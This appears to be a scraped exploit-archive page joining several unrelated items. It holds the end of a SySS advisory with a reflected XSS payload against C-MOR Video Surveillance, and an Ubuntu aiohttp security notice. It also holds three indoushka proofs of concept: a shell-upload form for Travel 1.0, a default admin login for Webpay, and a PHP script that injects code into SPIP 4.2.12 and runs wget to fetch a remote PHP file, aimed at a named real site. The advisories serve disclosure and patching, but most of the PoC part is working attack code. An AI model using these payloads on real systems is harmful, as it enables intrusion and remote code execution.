https://<HOST>/show-movies.pml?cam=cam1&days="><script>alert("SySS   
XSS!")</script><z="

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-020

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-020.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Cross Site Scripting

Ubuntu Security Notice 6991-1 - It was discovered that AIOHTTP did not properly restrict file access when the 'follow_symlinks' option was set to True. A remote attacker could possibly use this issue to access unauthorized files on the system.

==========================================================================  
Ubuntu Security Notice USN-6991-1  
September 05, 2024

python-aiohttp vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

python-aiohttp would allow unintended access to files over the network.

Software Description:  
- python-aiohttp: http client/server for asyncio

Details:

It was discovered that AIOHTTP did not properly restrict file access when  
the 'follow_symlinks' option was set to True. A remote attacker could  
possibly use this issue to access unauthorized files on the system.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  python-aiohttp-doc              3.9.1-1ubuntu0.1  
  python3-aiohttp                 3.9.1-1ubuntu0.1

Ubuntu 22.04 LTS  
  python-aiohttp-doc              3.8.1-4ubuntu0.2  
  python3-aiohttp                 3.8.1-4ubuntu0.2

Ubuntu 20.04 LTS  
  python3-aiohttp                 3.6.2-1ubuntu1+esm3  
                                  Available with Ubuntu Pro

Ubuntu 18.04 LTS  
  python3-aiohttp                 3.0.1-1ubuntu0.1~esm4  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6991-1  
  CVE-2024-23334

Package Information:  
  https://launchpad.net/ubuntu/+source/python-aiohttp/3.9.1-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/python-aiohttp/3.8.1-4ubuntu0.2

-----BEGIN PGP SIGNATURE-----

iQIzBAABCgAdFiEETB/nIDy9nvCSgAUj3gXQmO/Tr3wFAmbaO5QACgkQ3gXQmO/T  
r3w3hg/+Jd3vvi9UVfPnbSXnVWX6GJLLTHFdcXFH4RcQiPlFQM2iGRrQjNa5qXzK  
hor5PKU+At52cq2YGGHbqUA0Zx0+iE/XGcqP/V3ke/cmGM8MAz0MdrKht8et6TcZ  
yliGm2MLTg0zXGne90VjTxQ95WgDcftLiqpeRxiAMx5LCVXfW/YkmuA+AW+1GTVh  
gu4eczV9S+HpF/MBRPGDe5Jb1VilW30ygiV9aeJWMRJfLUovnJeGY8RfCjUsF+rC  
zBU5iDrY6/Fgdq6zp2uks/h5HOncs0OzT38F8L0fgiSWmDfxtBRXfg98Wd/xoo9/  
BJizQWZpLn50AGmQ8+NwD7rMYGlgFtVhm5TOo4DPotOWiwpmpq41Z1Q8J+cK/Kmz  
ZLNVO5s5yusyPkkDC07iIthPkG10O3vh7FM0bvNztxWUKf+K7MkG/kxm3TyHSF1a  
p8oS15JLAlQzwElIf4JaQkeHedOOv4apfDyTDw44t+/gaP4PTJkHPvwlSGPwTcQn  
6dg+i8udFDBoD8csZeFl7jLaJ7CuUnvhs1RIqjpKnMFL30kYWqXFtRPSEx/ObG8Q  
H31sNb5U1KUDMqz7PivEJ/q4uHQLlGYNCyKpsHnzDg92zLgkshL5/r1pJYY9+PKL  
Y5lFbZEeyMKvbeLGuhQwjjG0M4VhRYENQSJxxqWVCMLsJUdF/T0=  
=sQ45  
-----END PGP SIGNATURE-----

Ubuntu Security Notice USN-6991-1

Travel version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Travel v1.0 Remote File Upload Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://github.com/oretnom23/php-travel-agency-system                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .<form action="http://127.0.0.1/tour/admin/operations/admin.php?id=2" method="POST" enctype="multipart/form-data">   <label for="file">Upload File:</label>  <input type="file" id="file" name="file"><br><br>  <input type="submit" name="Fcuk Up" value="Fcuk Up"></form>[+] Go to the line 1.[+] Set the target site link Save changes and apply . [+] infected file : /tour/admin/operations/admin.php. [+] save code as poc.html .[+] Path : http://127.0.0.1/tour/admin/upload/webadmin.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Travel 1.0 Shell Upload

Webpay E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Insecure Settings Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Insecure Settings

SPIP version 4.2.12 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.12 PHP Code execution Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/fr_rubrique91.html                                                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 31 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?php<?phpclass indoushka {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }   private function generatePayload($payload) {    return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";}    public function exploit() {        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        $response = curl_exec($ch);        curl_close($ch);        echo "Exploit Sent! Response:\n";        echo $response;    }}$targetUrl = 'https://www.speleo-mandeure.fr/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("wget https://raw.githubusercontent.com/indoushka/Mari/master/install.php");'; // أوامر PHP التي تريد تنفيذها$exploit = new indoushka($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#auth